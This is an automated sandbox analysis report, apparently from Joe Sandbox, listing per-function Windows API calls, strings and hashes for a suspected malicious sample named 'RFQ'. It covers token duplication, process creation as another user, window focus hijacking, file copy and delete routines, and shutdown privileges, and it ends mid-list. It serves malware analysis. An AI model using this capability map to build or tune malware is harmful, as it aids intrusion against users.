                                                                          • GetForegroundWindow.USER32 ref: 00434420
                                                                          • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00434446
                                                                          • IsIconic.USER32(?), ref: 0043444F
                                                                          • ShowWindow.USER32(?,00000009), ref: 0043445C
                                                                          • SetForegroundWindow.USER32(?), ref: 0043446A
                                                                          • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00434481
                                                                          • GetCurrentThreadId.KERNEL32 ref: 00434485
                                                                          • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00434493
                                                                          • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 004344A2
                                                                          • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 004344A8
                                                                          • AttachThreadInput.USER32(00000000,?,00000001), ref: 004344B1
                                                                          • SetForegroundWindow.USER32(00000000), ref: 004344B7
                                                                          • MapVirtualKeyW.USER32(00000012,00000000), ref: 004344C6
                                                                          • keybd_event.USER32(00000012,00000000), ref: 004344CF
                                                                          • MapVirtualKeyW.USER32(00000012,00000000), ref: 004344DD
                                                                          • keybd_event.USER32(00000012,00000000), ref: 004344E6
                                                                          • MapVirtualKeyW.USER32(00000012,00000000), ref: 004344F4
                                                                          • keybd_event.USER32(00000012,00000000), ref: 004344FD
                                                                          • MapVirtualKeyW.USER32(00000012,00000000), ref: 0043450B
                                                                          • keybd_event.USER32(00000012,00000000), ref: 00434514
                                                                          • SetForegroundWindow.USER32(00000000), ref: 0043451E
                                                                          • AttachThreadInput.USER32(00000000,?,00000000), ref: 0043453F
                                                                          • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 00434545
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: ThreadWindow$AttachInput$ForegroundVirtualkeybd_event$Process$CurrentFindIconicShow
                                                                          • String ID: Shell_TrayWnd
                                                                          • API String ID: 2889586943-2988720461
                                                                          • Opcode ID: 8fb90041bee2e10260771149cd23f534c9f7767a381d567acbe6a88cba9e6a8e
                                                                          • Instruction ID: 0b42b206f44700a00bd4aa1610e9651ae8f7722fee000eb3c659fd44b6abead8
                                                                          • Opcode Fuzzy Hash: 8fb90041bee2e10260771149cd23f534c9f7767a381d567acbe6a88cba9e6a8e
                                                                          • Instruction Fuzzy Hash: AD416272640218BFE7205BA4DE4AFBE7B6CDB58B11F10442EFA01EA1D0D6F458419BA9
                                                                          APIs
                                                                          • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?), ref: 0044638E
                                                                          • CloseHandle.KERNEL32(?), ref: 004463A0
                                                                          • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 004463B8
                                                                          • GetProcessWindowStation.USER32 ref: 004463D1
                                                                          • SetProcessWindowStation.USER32(00000000), ref: 004463DB
                                                                          • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 004463F7
                                                                          • _wcslen.LIBCMT ref: 00446498
                                                                            • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                          • _wcsncpy.LIBCMT ref: 004464C0
                                                                          • LoadUserProfileW.USERENV(?,00000020), ref: 004464D9
                                                                          • CreateEnvironmentBlock.USERENV(?,?,00000000), ref: 004464F3
                                                                          • CreateProcessAsUserW.ADVAPI32(?,00000000,00000000,00000000,00000000,?,?,?,?,000F01FF,00000400), ref: 00446522
                                                                          • UnloadUserProfile.USERENV(?,?), ref: 00446555
                                                                          • CloseWindowStation.USER32(00000000), ref: 0044656C
                                                                          • CloseDesktop.USER32(?), ref: 0044657A
                                                                          • SetProcessWindowStation.USER32(?), ref: 00446588
                                                                          • CloseHandle.KERNEL32(?), ref: 00446592
                                                                          • DestroyEnvironmentBlock.USERENV(?), ref: 004465A9
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: StationWindow$CloseProcess$User$BlockCreateDesktopEnvironmentHandleOpenProfile$DestroyDuplicateLoadTokenUnload_malloc_wcslen_wcsncpy
                                                                          • String ID: $@OH$default$winsta0
                                                                          • API String ID: 3324942560-3791954436
                                                                          • Opcode ID: b5525f1ade2b057c7f9e31d74da72dff15b4031de69b799d2ab87430ccd2f155
                                                                          • Instruction ID: a255b9755a473e3b45922b0ee48cea4cb67e1360e8ecd59b8ab49ad27cdc7b44
                                                                          • Opcode Fuzzy Hash: b5525f1ade2b057c7f9e31d74da72dff15b4031de69b799d2ab87430ccd2f155
                                                                          • Instruction Fuzzy Hash: A28180B0A00209ABEF10CFA5DD4AFAF77B8AF49704F05455EF914A7284D778D901CB69
                                                                          APIs
                                                                          • _wcslen.LIBCMT ref: 004096C1
                                                                            • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                          • _memmove.LIBCMT ref: 0040970C
                                                                            • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                                                                            • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                                                                            • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                                                                          • CharUpperBuffW.USER32(?,?,?,?,?,?,?,00000000), ref: 00409753
                                                                          • _memmove.LIBCMT ref: 00409D96
                                                                          • _memmove.LIBCMT ref: 0040A6C4
                                                                          • _memmove.LIBCMT ref: 004297E5
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: _memmove$std::exception::exception$BuffCharException@8ThrowUpper_malloc_wcslen
                                                                          • String ID:
                                                                          • API String ID: 2383988440-0
                                                                          • Opcode ID: b038371bcf1c5dd0eef4ce0c8f02f873b5b7968284c29e04085d9bb22d62c8a1
                                                                          • Instruction ID: 3262ed4b583d717621f118bf118656dde374edbe3d76219253c131e703a2432c
                                                                          • Opcode Fuzzy Hash: b038371bcf1c5dd0eef4ce0c8f02f873b5b7968284c29e04085d9bb22d62c8a1
                                                                          • Instruction Fuzzy Hash: CD13BF706043109FD724DF25D480A2BB7E1BF89304F54896EE8869B392D739EC56CB9B
                                                                          APIs
                                                                            • Part of subcall function 00410120: GetFullPathNameW.KERNEL32(00000000,00000104,004A7F6C,0040F545,004A7F6C,004A90E8,004A7F6C,?,0040F545), ref: 0041013C
                                                                            • Part of subcall function 00433908: __wsplitpath.LIBCMT ref: 0043392E
                                                                            • Part of subcall function 00433908: __wsplitpath.LIBCMT ref: 00433950
                                                                            • Part of subcall function 00433908: __wcsicoll.LIBCMT ref: 00433974
                                                                            • Part of subcall function 00433998: GetFileAttributesW.KERNEL32(?), ref: 0043399F
                                                                          • _wcscat.LIBCMT ref: 0044BD94
                                                                          • _wcscat.LIBCMT ref: 0044BDBD
                                                                          • __wsplitpath.LIBCMT ref: 0044BDEA
                                                                          • FindFirstFileW.KERNEL32(?,?), ref: 0044BE02
                                                                          • _wcscpy.LIBCMT ref: 0044BE71
                                                                          • _wcscat.LIBCMT ref: 0044BE83
                                                                          • _wcscat.LIBCMT ref: 0044BE95
                                                                          • lstrcmpiW.KERNEL32(?,?), ref: 0044BEC1
                                                                          • DeleteFileW.KERNEL32(?), ref: 0044BED3
                                                                          • MoveFileW.KERNEL32(?,?), ref: 0044BEF3
                                                                          • CopyFileW.KERNEL32(?,?,00000000), ref: 0044BF0A
                                                                          • DeleteFileW.KERNEL32(?), ref: 0044BF15
                                                                          • CopyFileW.KERNEL32(?,?,00000000), ref: 0044BF2C
                                                                          • FindClose.KERNEL32(00000000), ref: 0044BF33
                                                                          • MoveFileW.KERNEL32(?,?), ref: 0044BF4F
                                                                          • FindNextFileW.KERNEL32(00000000,00000010), ref: 0044BF64
                                                                          • FindClose.KERNEL32(00000000), ref: 0044BF7C
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: File$Find_wcscat$__wsplitpath$CloseCopyDeleteMove$AttributesFirstFullNameNextPath__wcsicoll_wcscpylstrcmpi
                                                                          • String ID: \*.*
                                                                          • API String ID: 2188072990-1173974218
                                                                          • Opcode ID: c24caf0b266a53f5e7acd00b30f5ede1e5d756040c77aa0fe23e7167681731b8
                                                                          • Instruction ID: 72a2fd59153234373391f972af8bc7e503bf673df65afccb4f4ecee040a4f935
                                                                          • Opcode Fuzzy Hash: c24caf0b266a53f5e7acd00b30f5ede1e5d756040c77aa0fe23e7167681731b8
                                                                          • Instruction Fuzzy Hash: E25167B2408384AAD734DB50DC45EDF73E9AFC8304F544E1EF68982141EB75D249CBA6
                                                                          APIs
                                                                          • FindFirstFileW.KERNEL32(00000000,?,?), ref: 004788E4
                                                                          • FindClose.KERNEL32(00000000), ref: 00478924
                                                                          • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00478949
                                                                          • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00478961
                                                                          • FileTimeToSystemTime.KERNEL32(?,?), ref: 00478989
                                                                          • __swprintf.LIBCMT ref: 004789D3
                                                                          • __swprintf.LIBCMT ref: 00478A1D
                                                                          • __swprintf.LIBCMT ref: 00478A4B
                                                                          • __swprintf.LIBCMT ref: 00478A79
                                                                            • Part of subcall function 0041329B: __flsbuf.LIBCMT ref: 00413314
                                                                            • Part of subcall function 0041329B: __flsbuf.LIBCMT ref: 0041332C
                                                                          • __swprintf.LIBCMT ref: 00478AA7
                                                                          • __swprintf.LIBCMT ref: 00478AD5
                                                                          • __swprintf.LIBCMT ref: 00478B03
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem
                                                                          • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                                                                          • API String ID: 999945258-2428617273
                                                                          • Opcode ID: 438ad41bdba169d6dbcdf3912f97c2a8dc3502a0945a742a170651836116907f
                                                                          • Instruction ID: 8fd0730747e081185947bc4026d2fd3d0a29cbe563c255e8678d3cf3417a7967
                                                                          • Opcode Fuzzy Hash: 438ad41bdba169d6dbcdf3912f97c2a8dc3502a0945a742a170651836116907f
                                                                          • Instruction Fuzzy Hash: 32719772204300ABC310EF55CC85FAFB7E9AF88705F504D2FF645962D1E6B9E944875A
                                                                          APIs
                                                                            • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                            • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                          • GetCurrentDirectoryW.KERNEL32(00000104,?,?), ref: 00403451
                                                                          • GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 00403467
                                                                          • __wsplitpath.LIBCMT ref: 00403492
                                                                            • Part of subcall function 00413A0E: __wsplitpath_helper.LIBCMT ref: 00413A50
                                                                          • _wcscpy.LIBCMT ref: 004034A7
                                                                          • _wcscat.LIBCMT ref: 004034BC
                                                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 004034CC
                                                                            • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                            • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                                                                            • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                                                                            • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                                                                            • Part of subcall function 00403AF0: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,?,?,?,0040355C,?,?,?,00000010), ref: 00403B08
                                                                            • Part of subcall function 00403AF0: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,?,?,00000010), ref: 00403B41
                                                                          • _wcscpy.LIBCMT ref: 004035A0
                                                                          • _wcslen.LIBCMT ref: 00403623
                                                                          • _wcslen.LIBCMT ref: 0040367D
                                                                          Strings
                                                                          • #include depth exceeded. Make sure there are no recursive includes, xrefs: 00428200
                                                                          • Error opening the file, xrefs: 00428231
                                                                          • Unterminated string, xrefs: 00428348
                                                                          • _, xrefs: 0040371C
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: _wcslen$ByteCharCurrentDirectoryMultiWide_wcscpystd::exception::exception$Exception@8FullNamePathThrow__wsplitpath__wsplitpath_helper_malloc_memmove_wcscat
                                                                          • String ID: #include depth exceeded. Make sure there are no recursive includes$Error opening the file$Unterminated string$_
                                                                          • API String ID: 3393021363-188983378
                                                                          • Opcode ID: 7ca9ad7ef7208bb045d11657cd721343b767352ed1bccac0ebefd6c576abac4e
                                                                          • Instruction ID: 51a390cb75b153cc6cab8b26b712b327f6f81406d0e69f910df9a3585dc9283e
                                                                          • Opcode Fuzzy Hash: 7ca9ad7ef7208bb045d11657cd721343b767352ed1bccac0ebefd6c576abac4e
                                                                          • Instruction Fuzzy Hash: CCD105B1508341AAD710EF64D841AEFBBE8AF85304F404C2FF98553291DB79DA49C7AB
                                                                          APIs
                                                                          • FindFirstFileW.KERNEL32(?,?), ref: 00431AAA
                                                                          • GetFileAttributesW.KERNEL32(?), ref: 00431AE7
                                                                          • SetFileAttributesW.KERNEL32(?,?), ref: 00431AFD
                                                                          • FindNextFileW.KERNEL32(00000000,?), ref: 00431B0F
                                                                          • FindClose.KERNEL32(00000000), ref: 00431B20
                                                                          • FindClose.KERNEL32(00000000), ref: 00431B34
                                                                          • FindFirstFileW.KERNEL32(*.*,?), ref: 00431B4F
                                                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 00431B96
                                                                          • SetCurrentDirectoryW.KERNEL32(0048AB30), ref: 00431BBA
                                                                          • FindNextFileW.KERNEL32(00000000,00000010), ref: 00431BC2
                                                                          • FindClose.KERNEL32(00000000), ref: 00431BCD
                                                                          • FindClose.KERNEL32(00000000), ref: 00431BDB
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
                                                                          • String ID: *.*
                                                                          • API String ID: 1409584000-438819550
                                                                          • Opcode ID: 375c8f5163c02f9b34b1ce4408ff1b09f98ffe2d72fc8025119183882b6461df
                                                                          • Instruction ID: b696eadadcb8a1627fc7fa6feda0e6e57aab690e04623b9265854ab7309d24dd
                                                                          • Opcode Fuzzy Hash: 375c8f5163c02f9b34b1ce4408ff1b09f98ffe2d72fc8025119183882b6461df
                                                                          • Instruction Fuzzy Hash: CE41D8726002046BC700EF65DC45EAFB3ACAE89311F04592FF954C3190E7B8E519C7A9
                                                                          APIs
                                                                          • GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 00431C09
                                                                          • __swprintf.LIBCMT ref: 00431C2E
                                                                          • _wcslen.LIBCMT ref: 00431C3A
                                                                          • CreateDirectoryW.KERNEL32(?,00000000), ref: 00431C67
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: CreateDirectoryFullNamePath__swprintf_wcslen
                                                                          • String ID: :$\$\??\%s
                                                                          • API String ID: 2192556992-3457252023
                                                                          • Opcode ID: e3674d1d1678aa5b2072ca287ea13c599f7f343b69fea712d52b9408e430d9c0
                                                                          • Instruction ID: 5b8928ca783b893dacbf0721098a8616f59dd17613a34138e213b27d6ec4c177
                                                                          • Opcode Fuzzy Hash: e3674d1d1678aa5b2072ca287ea13c599f7f343b69fea712d52b9408e430d9c0
                                                                          • Instruction Fuzzy Hash: EE413E726403186BD720DB54DC45FDFB3BCFF58710F00859AFA0896191EBB49A548BD8
                                                                          APIs
                                                                          • GetLocalTime.KERNEL32(?), ref: 004722A2
                                                                          • __swprintf.LIBCMT ref: 004722B9
                                                                          • SHGetFolderPathW.SHELL32(00000000,00000026,00000000,00000000,0048BF68), ref: 004724EC
                                                                          • SHGetFolderPathW.SHELL32(00000000,0000002B,00000000,00000000,0048BF68), ref: 00472506
                                                                          • SHGetFolderPathW.SHELL32(00000000,00000005,00000000,00000000,0048BF68), ref: 00472520
                                                                          • SHGetFolderPathW.SHELL32(00000000,00000023,00000000,00000000,0048BF68), ref: 0047253A
                                                                          • SHGetFolderPathW.SHELL32(00000000,00000019,00000000,00000000,0048BF68), ref: 00472554
                                                                          • SHGetFolderPathW.SHELL32(00000000,0000002E,00000000,00000000,0048BF68), ref: 0047256E
                                                                          • SHGetFolderPathW.SHELL32(00000000,0000001F,00000000,00000000,0048BF68), ref: 00472588
                                                                          • SHGetFolderPathW.SHELL32(00000000,00000017,00000000,00000000,0048BF68), ref: 004725A2
                                                                          • SHGetFolderPathW.SHELL32(00000000,00000016,00000000,00000000,0048BF68), ref: 004725BC
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: FolderPath$LocalTime__swprintf
                                                                          • String ID: %.3d
                                                                          • API String ID: 3337348382-986655627
                                                                          • Opcode ID: 7886e1de9339dcccb7d90e6fd0fd2fa7ca800526018001cd1a68e58c6d42a46d
                                                                          • Instruction ID: 0d137f706e98bab13a4a4c7fcb7914b07bdb7c22a72ec07ab57cd4d47a51df83
                                                                          • Opcode Fuzzy Hash: 7886e1de9339dcccb7d90e6fd0fd2fa7ca800526018001cd1a68e58c6d42a46d
                                                                          • Instruction Fuzzy Hash: A6C1EC326101185BD710FBA1DD8AFEE7328EB44701F5045BFF909A60C2DBB99B598F64
                                                                          APIs
                                                                          • FindFirstFileW.KERNEL32(?,?), ref: 004428A8
                                                                          • FindNextFileW.KERNEL32(00000000,?), ref: 0044290B
                                                                          • FindClose.KERNEL32(00000000), ref: 0044291C
                                                                          • FindClose.KERNEL32(00000000), ref: 00442930
                                                                          • FindFirstFileW.KERNEL32(*.*,?), ref: 0044294D
                                                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 0044299C
                                                                          • SetCurrentDirectoryW.KERNEL32(0048AB30), ref: 004429BF
                                                                          • FindNextFileW.KERNEL32(00000000,00000010), ref: 004429C9
                                                                          • FindClose.KERNEL32(00000000), ref: 004429D4
                                                                            • Part of subcall function 00433C08: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00433C2A
                                                                          • FindClose.KERNEL32(00000000), ref: 004429E2
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
                                                                          • String ID: *.*
                                                                          • API String ID: 2640511053-438819550
                                                                          • Opcode ID: 8a47bb142582fb369a588aeabde8b58686abdf3d8367fad8d2448c9b03ae91f1
                                                                          • Instruction ID: 696d482812dd8bff2d9106dd2d2144e175b5fe2258968c3fd44c1969776f6f9a
                                                                          • Opcode Fuzzy Hash: 8a47bb142582fb369a588aeabde8b58686abdf3d8367fad8d2448c9b03ae91f1
                                                                          • Instruction Fuzzy Hash: AD410AB2A001186BDB10EBA5ED45FEF73689F89321F50465BFD0493280D6B8DE558BB8
                                                                          APIs
                                                                          • GetCurrentProcess.KERNEL32(00000028,?), ref: 004333CE
                                                                          • OpenProcessToken.ADVAPI32(00000000), ref: 004333D5
                                                                          • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 004333EA
                                                                          • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 0043340E
                                                                          • GetLastError.KERNEL32 ref: 00433414
                                                                          • ExitWindowsEx.USER32(?,00000000), ref: 00433437
                                                                          • InitiateSystemShutdownExW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,?), ref: 00433466
                                                                          • SetSystemPowerState.KERNEL32(00000001,00000000), ref: 00433479
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
